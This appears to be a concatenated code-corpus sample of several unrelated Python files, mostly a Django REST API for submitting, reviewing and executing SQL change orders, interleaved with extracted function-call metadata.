True, 'import tensorflow as tf\n'), ((3556, 3591), 'os.path.join', 'os.path.join', (['logdir', '"""checkpoints"""'], {}), "(logdir, 'checkpoints')\n", (3568, 3591), False, 'import os\n'), ((5127, 5179), 'tensorflow.split', 'tf.split', ([], {'axis': '(0)', 'num_or_size_splits': 
'nsteps', 'value': 'h'}), '(axis=0, num_or_size_splits=nsteps, value=h)\n', (5135, 5179), True, 'import tensorflow as tf\n'), ((5556, 5583), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(0)', 'values': 'h'}), '(axis=0, values=h)\n', (5565, 5583), True, 'import tensorflow as tf\n'), ((5631, 5657), 'tensorflow.stack', 'tf.stack', ([], {'values': 'h', 'axis': '(0)'}), '(values=h, axis=0)\n', (5639, 5657), True, 'import tensorflow as tf\n'), ((7467, 7477), 'tensorflow.tanh', 'tf.tanh', (['c'], {}), '(c)\n', (7474, 7477), True, 'import tensorflow as tf\n'), ((1419, 1428), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (1425, 1428), True, 'import tensorflow as tf\n'), ((1791, 1818), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1816, 1818), False, 'import multiprocessing\n'), ((3754, 3796), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/*"""'], {}), "(self.logdir, 'checkpoints/*')\n", (3766, 3796), False, 'import os\n'), ((6472, 6495), 'numpy.random.randn', 'np.random.randn', (['*shape'], {}), '(*shape)\n', (6487, 6495), True, 'import numpy as np\n'), ((7023, 7051), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (7046, 7051), True, 'import tensorflow as tf\n'), ((7212, 7228), 'tensorflow.matmul', 'tf.matmul', (['x', 'wx'], {}), '(x, wx)\n', (7221, 7228), True, 'import tensorflow as tf\n'), ((7231, 7247), 'tensorflow.matmul', 'tf.matmul', (['h', 'wh'], {}), '(h, wh)\n', (7240, 7247), True, 'import tensorflow as tf\n'), ((12133, 12157), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (12155, 12157), True, 'import tensorflow as tf\n'), ((12390, 12414), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (12412, 12414), True, 'import tensorflow as tf\n'), ((5943, 5962), 'numpy.prod', 'np.prod', (['shape[:-1]'], {}), '(shape[:-1])\n', (5950, 5962), True, 'import numpy as np\n'), ((10663, 10687), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (10685, 10687), True, 'import tensorflow as tf\n'), ((11983, 12027), 'tensorflow.reshape', 'tf.reshape', (['theta[start:start + size]', 'shape'], {}), '(theta[start:start + size], shape)\n', (11993, 12027), True, 'import tensorflow as tf\n'), ((6544, 6558), 'numpy.square', 'np.square', (['out'], {}), '(out)\n', (6553, 6558), True, 'import numpy as np\n'), ((11457, 11473), 'tensorflow.zeros_like', 'tf.zeros_like', (['v'], {}), '(v)\n', (11470, 11473), True, 'import tensorflow as tf\n'), ((3892, 3911), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (3908, 3911), False, 'import os\n')] |
from functools import wraps
from werkzeug.exceptions import HTTPException
from api.exceptions import MessageNotFound
def api_error_handler(func):
@wraps(func)
def handle_errors(*args, **kwargs):
try:
return func(*args, **kwargs)
except MessageNotFound as e:
return e.message, 404
except HTTPException:
raise
except Exception:
return "API Internal error", 500
return handle_errors
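# Illustrative usage (assumed Flask-style view and route, not part of this module):
#   @app.route("/messages/<int:message_id>")
#   @api_error_handler
#   def get_message(message_id):
#       ...
# MessageNotFound becomes a 404 carrying its message, other HTTPExceptions are
# re-raised untouched, and any other exception is reported as a generic 500.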
| [
"functools.wraps"
]
| [((153, 164), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (158, 164), False, 'from functools import wraps\n')] |
"""Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
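# A script passed to this command is expected to expose a run(nre) function,
# e.g. (illustrative sketch; the exact NRE helpers available depend on the
# installed nile version):
#   def run(nre):
#       print("network:", nre.network)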
| [
"logging.getLogger",
"importlib.machinery.SourceFileLoader",
"nile.nre.NileRuntimeEnvironment"
]
| [((237, 256), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (254, 256), False, 'import logging\n'), ((354, 385), 'nile.nre.NileRuntimeEnvironment', 'NileRuntimeEnvironment', (['network'], {}), '(network)\n', (376, 385), False, 'from nile.nre import NileRuntimeEnvironment\n'), ((297, 329), 'importlib.machinery.SourceFileLoader', 'SourceFileLoader', (['"""script"""', 'path'], {}), "('script', path)\n", (313, 329), False, 'from importlib.machinery import SourceFileLoader\n')] |
#!/usr/bin/env python
import setuptools
from setuptools import setup
from os import path
# Read the package requirements
with open("requirements.txt", "r") as f:
requirements = [line.rstrip("\n") for line in f if line != "\n"]
# Read the contents of the README file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='access-spotify',
version="1.1",
author="pancham_banerjee",
author_email="<EMAIL>",
packages=setuptools.find_packages(),
scripts=["./bin/access_script.py"],
install_requires=requirements,
license="MIT",
description="A package to get all album and track info for an artist by querying the Spotify API",
long_description=long_description,
long_description_content_type='text/markdown'
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
]
| [((303, 325), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (315, 325), False, 'from os import path\n'), ((337, 375), 'os.path.join', 'path.join', (['this_directory', '"""README.md"""'], {}), "(this_directory, 'README.md')\n", (346, 375), False, 'from os import path\n'), ((562, 588), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (586, 588), False, 'import setuptools\n')] |
import os
import pandas as pd
class LiveProjectPopularityBasedRecs:
def __init__(self):
self.charts = {}
charts_folder = "charts"
if os.path.isdir(charts_folder):
for file in os.listdir("charts"):
name, ext = file.split('.')
if ext == "csv" and len(name) > 0:
self.charts[name] = pd.read_csv("{}/{}".format(charts_folder, file), index_col=0)
else:
print("Genre Global and Charts not implemented!")
def genre_chart(self, genre):
if genre in self.charts:
return self.charts[genre]
elif "Top" in self.charts:
return self.charts["Top"]
else:
return ""
| [
"os.listdir",
"os.path.isdir"
]
| [((165, 193), 'os.path.isdir', 'os.path.isdir', (['charts_folder'], {}), '(charts_folder)\n', (178, 193), False, 'import os\n'), ((220, 240), 'os.listdir', 'os.listdir', (['"""charts"""'], {}), "('charts')\n", (230, 240), False, 'import os\n')] |
#!../env/bin/python
"""A simple test script for the PCE portion of OnRamp.
Usage: ./test_pce.py
This script is only intended to be run in a fresh install of the repository. It
has side-effects that could corrupt module and user data if run in a production
setting.
Prior to running this script, ensure that onramp/pce/bin/onramp_pce_install.py
has been called and that the server is running. Also ensure
./test_pce_config.cfg contains the proper settings.
"""
import nose
import sys
if __name__ == '__main__':
print (__doc__)
response = raw_input('(C)ontinue or (A)bort? ')
if response != 'C':
sys.exit(0)
nose.main()
| [
"nose.main",
"sys.exit"
]
| [((635, 646), 'nose.main', 'nose.main', ([], {}), '()\n', (644, 646), False, 'import nose\n'), ((618, 629), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (626, 629), False, 'import sys\n')] |
from sanic import Blueprint
from sanic_transmute import add_route
from .views import (
get_all,
get_status_by_country_id,
get_status_by_country_name,
get_deaths,
get_active_cases,
get_recovered_cases,
get_confirmed_cases,
list_countries,
)
cases = Blueprint("cases", url_prefix="/cases")
add_route(cases, get_all)
add_route(cases, get_status_by_country_id)
add_route(cases, get_status_by_country_name)
add_route(cases, get_deaths)
add_route(cases, get_active_cases)
add_route(cases, get_recovered_cases)
add_route(cases, get_confirmed_cases)
add_route(cases, list_countries)
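# Illustrative registration (assumption, not part of this module): the blueprint
# is attached in the application factory, e.g. app.blueprint(cases), after which
# sanic_transmute wires each view added above under the /cases prefix.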
| [
"sanic.Blueprint",
"sanic_transmute.add_route"
]
| [((281, 320), 'sanic.Blueprint', 'Blueprint', (['"""cases"""'], {'url_prefix': '"""/cases"""'}), "('cases', url_prefix='/cases')\n", (290, 320), False, 'from sanic import Blueprint\n'), ((321, 346), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_all'], {}), '(cases, get_all)\n', (330, 346), False, 'from sanic_transmute import add_route\n'), ((347, 389), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_status_by_country_id'], {}), '(cases, get_status_by_country_id)\n', (356, 389), False, 'from sanic_transmute import add_route\n'), ((390, 434), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_status_by_country_name'], {}), '(cases, get_status_by_country_name)\n', (399, 434), False, 'from sanic_transmute import add_route\n'), ((435, 463), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_deaths'], {}), '(cases, get_deaths)\n', (444, 463), False, 'from sanic_transmute import add_route\n'), ((464, 498), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_active_cases'], {}), '(cases, get_active_cases)\n', (473, 498), False, 'from sanic_transmute import add_route\n'), ((499, 536), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_recovered_cases'], {}), '(cases, get_recovered_cases)\n', (508, 536), False, 'from sanic_transmute import add_route\n'), ((537, 574), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_confirmed_cases'], {}), '(cases, get_confirmed_cases)\n', (546, 574), False, 'from sanic_transmute import add_route\n'), ((575, 607), 'sanic_transmute.add_route', 'add_route', (['cases', 'list_countries'], {}), '(cases, list_countries)\n', (584, 607), False, 'from sanic_transmute import add_route\n')] |
# -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
    # Get the list of order environments
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
    # Get the list of schemas for the specified environment and purpose
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
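# The data payload built above is {'columns': [...], 'data': {'status': 0|1,
# 'data': [...]}}; status 0 means the syntax check passed and the SQL can be
# submitted.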
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
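# Note: .first() above returns None when no execute task exists for the given
# order_id, so accessing .task_id would raise AttributeError rather than
# producing a clean 404; callers are assumed to pass an order that has tasks.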
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is turned on:
        # only the applicant, auditor, reviewer and superusers may view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom "num" column, used by the front end to display row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'result', 'value': '查看结果'},  # custom "result" column
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is turned on:
        # only the applicant, auditor, reviewer and superusers may view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom "num" column, used by the front end to display row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'execute', 'value': '执行'},  # custom "execute" column
            {'key': 'result', 'value': '查看结果'},  # custom "result" column
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
            instance=models.ReleaseVersions.objects.get(pk=kwargs['key']),  # returns a single record
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
    lookup_field = 'id'  # defaults to the primary key, so this line is optional
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
        # Look up the primary key of the given version
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
        # Fetch the environments and pivot the rows into dynamic columns
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
        # Get the status of every order in each environment (the environments are dynamic columns)
        # the generated id column has no real meaning
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
        # Get the environment column names
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
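# A minimal, hypothetical URL wiring sketch (not part of the original project): OpSqlOrderView
# above is a plain ViewSet, so its handlers are not auto-routed and each action must be bound
# explicitly via as_view(); the path strings below are illustrative assumptions only.
from django.urls import path

sketch_urlpatterns = [
    path('orders/<int:pk>/approve', OpSqlOrderView.as_view({'put': 'approve'})),
    path('orders/<int:pk>/feedback', OpSqlOrderView.as_view({'put': 'feedback'})),
    path('orders/<int:pk>/close', OpSqlOrderView.as_view({'put': 'close'})),
    path('orders/<int:pk>/review', OpSqlOrderView.as_view({'put': 'review'})),
]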
| [
"sqlorders.models.ReleaseVersions.objects.filter",
"sqlorders.serializers.ExecuteMultiTasksSerializer",
"sqlorders.models.DbEnvironment.objects.all",
"sqlorders.serializers.IncepSyntaxCheckSerializer",
"sqlorders.models.DbOrdersExecuteTasks.objects.filter",
"datetime.timedelta",
"sqlorders.models.ReleaseVersions.objects.get",
"sqlorders.models.DbOrders.objects.get",
"django.http.HttpResponse",
"django.utils.timezone.now",
"sqlorders.serializers.ThrottleTaskSerializer",
"sqlorders.models.DbExportFiles.objects.get",
"sqlorders.models.DbOrdersExecuteTasks.objects.get",
"sqlorders.serializers.DbSchemasSerializer",
"json.loads",
"sqlorders.models.DbEnvironment.objects.values",
"libs.response.JsonResponseV1",
"sqlorders.models.ReleaseVersions.objects.all",
"sqlorders.models.DbExportFiles.objects.filter",
"rest_framework.exceptions.PermissionDenied",
"sqlorders.models.DbOrdersExecuteTasks.objects.all",
"sqlorders.serializers.ExecuteSingleTaskSerializer",
"sqlorders.models.DbOrders.objects.raw",
"sqlorders.serializers.HookSqlOrdersSerializer",
"sqlorders.serializers.GenerateSqlOrdersTasksSerializer",
"sqlorders.models.DbOrders.objects.all",
"base64.b64decode",
"libs.permissions.anyof",
"libs.RenderColumns.render_dynamic_columns"
]
| [((868, 902), 'sqlorders.models.DbEnvironment.objects.all', 'models.DbEnvironment.objects.all', ([], {}), '()\n', (900, 902), False, 'from sqlorders import models, serializers\n'), ((3250, 3279), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ([], {}), '()\n', (3277, 3279), False, 'from sqlorders import models, serializers\n'), ((4754, 4783), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ([], {}), '()\n', (4781, 4783), False, 'from sqlorders import models, serializers\n'), ((8270, 8311), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (8309, 8311), False, 'from sqlorders import models, serializers\n'), ((10671, 10712), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (10710, 10712), False, 'from sqlorders import models, serializers\n'), ((14235, 14276), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ([], {}), '()\n', (14274, 14276), False, 'from sqlorders import models, serializers\n'), ((16798, 16834), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ([], {}), '()\n', (16832, 16834), False, 'from sqlorders import models, serializers\n'), ((19021, 19057), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ([], {}), '()\n', (19055, 19057), False, 'from sqlorders import models, serializers\n'), ((1109, 1145), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'data': 'serializer.data'}), '(data=serializer.data)\n', (1123, 1145), False, 'from libs.response import JsonResponseV1\n'), ((1253, 1311), 'sqlorders.serializers.DbSchemasSerializer', 'serializers.DbSchemasSerializer', ([], {'data': 'request.query_params'}), '(data=request.query_params)\n', (1284, 1311), False, 'from sqlorders import models, serializers\n'), ((1418, 1472), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': 'serializer.errors', 'code': '"""0001"""'}), "(message=serializer.errors, code='0001')\n", (1432, 1472), False, 'from libs.response import JsonResponseV1\n'), ((1579, 1636), 'sqlorders.serializers.IncepSyntaxCheckSerializer', 'serializers.IncepSyntaxCheckSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (1617, 1636), False, 'from sqlorders import models, 